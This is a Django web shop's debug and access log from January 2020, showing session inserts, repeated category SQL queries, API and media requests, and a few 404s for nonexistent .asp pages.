(0.013) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'tggz6c28w3sxgaqbp2cejxjtzmgf9wmn' LIMIT 1; args=('tggz6c28w3sxgaqbp2cejxjtzmgf9wmn',) DEBUG 2020-01-01 04:51:09,273 utils 2749 140297233225472 (0.002) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('tggz6c28w3sxgaqbp2cejxjtzmgf9wmn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T04:51:09.270101+00:00'::timestamptz); args=('tggz6c28w3sxgaqbp2cejxjtzmgf9wmn', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 4, 51, 9, 270101, tzinfo=)) [01/Jan/2020 04:51:09] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /index.asp [01/Jan/2020 04:54:05] "GET /index.asp HTTP/1.0" 404 6338 [01/Jan/2020 04:55:47] "GET / HTTP/1.0" 302 0 [01/Jan/2020 04:58:12] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 04:58:14,961 utils 2749 140297233225472 (0.002) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'q66eg82zcyl5v6ijjgrpurhvq05aaom9' LIMIT 1; args=('q66eg82zcyl5v6ijjgrpurhvq05aaom9',) DEBUG 2020-01-01 04:58:14,962 utils 2749 140297233225472 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('q66eg82zcyl5v6ijjgrpurhvq05aaom9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-15T04:58:14.961598+00:00'::timestamptz); args=('q66eg82zcyl5v6ijjgrpurhvq05aaom9', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 15, 4, 58, 14, 961598, tzinfo=)) [01/Jan/2020 04:58:14] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /robots.txt [01/Jan/2020 04:58:21] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /dyzl/Print.asp [01/Jan/2020 04:58:31] "GET /dyzl/Print.asp?ArticleID=291 HTTP/1.0" 404 6367 Not Found: /xyzx/SendMail.asp [01/Jan/2020 04:58:39] "GET /xyzx/SendMail.asp?ArticleID=371 HTTP/1.0" 404 6376 [01/Jan/2020 05:05:03] "GET / HTTP/1.0" 302 0 [01/Jan/2020 05:08:23] "HEAD / HTTP/1.0" 302 0 [01/Jan/2020 05:10:05] "GET / HTTP/1.0" 302 0 [01/Jan/2020 05:15:08] "GET / HTTP/1.0" 302 0 [01/Jan/2020 05:17:15] "GET / HTTP/1.0" 302 0 [01/Jan/2020 05:20:11] "GET / HTTP/1.0" 302 0 [01/Jan/2020 05:25:14] "GET / HTTP/1.0" 302 0 [01/Jan/2020 05:30:16] "GET / HTTP/1.0" 302 0 [01/Jan/2020 05:35:19] "GET / HTTP/1.0" 302 0 [01/Jan/2020 05:40:22] "GET / HTTP/1.0" 302 0 [01/Jan/2020 05:45:24] "GET / HTTP/1.0" 302 0 [01/Jan/2020 05:50:27] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 05:55:24,975 utils 2749 140297233225472 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2020-01-01 05:55:24,984 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2020-01-01 05:55:24,987 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2020-01-01 05:55:24,990 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2020-01-01 05:55:24,993 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2020-01-01 05:55:24,995 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2020-01-01 05:55:24,998 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2020-01-01 05:55:25,001 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2020-01-01 05:55:25,005 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2020-01-01 05:55:25,009 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2020-01-01 05:55:25,011 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2020-01-01 05:55:25,013 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2020-01-01 05:55:25,015 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2020-01-01 05:55:25,018 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2020-01-01 05:55:25,021 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2020-01-01 05:55:25,024 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2020-01-01 05:55:25,026 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2020-01-01 05:55:25,028 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2020-01-01 05:55:25,030 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2020-01-01 05:55:25,034 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2020-01-01 05:55:25,036 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2020-01-01 05:55:25,039 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2020-01-01 05:55:25,041 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2020-01-01 05:55:25,043 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2020-01-01 05:55:25,046 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2020-01-01 05:55:25,049 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2020-01-01 05:55:25,051 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2020-01-01 05:55:25,054 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2020-01-01 05:55:25,056 utils 2749 140297233225472 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2020-01-01 05:55:25,058 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2020-01-01 05:55:25,062 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2020-01-01 05:55:25,064 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2020-01-01 05:55:25,066 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2020-01-01 05:55:25,069 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2020-01-01 05:55:25,071 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2020-01-01 05:55:25,074 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2020-01-01 05:55:25,077 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2020-01-01 05:55:25,079 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2020-01-01 05:55:25,081 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2020-01-01 05:55:25,084 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2020-01-01 05:55:25,086 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2020-01-01 05:55:25,089 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2020-01-01 05:55:25,091 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2020-01-01 05:55:25,093 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2020-01-01 05:55:25,096 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2020-01-01 05:55:25,098 utils 2749 140297233225472 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [01/Jan/2020 05:55:25] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [01/Jan/2020 05:55:25] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [01/Jan/2020 05:55:25] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [01/Jan/2020 05:55:29] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-01 05:55:55,114 utils 2749 140297243715328 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2020-01-01 05:55:55,123 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2020-01-01 05:55:55,126 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2020-01-01 05:55:55,129 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2020-01-01 05:55:55,132 utils 2749 140297243715328 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2020-01-01 05:55:55,134 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2020-01-01 05:55:55,137 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2020-01-01 05:55:55,139 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2020-01-01 05:55:55,141 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2020-01-01 05:55:55,145 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2020-01-01 05:55:55,147 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2020-01-01 05:55:55,149 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2020-01-01 05:55:55,151 utils 2749 140297243715328 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) 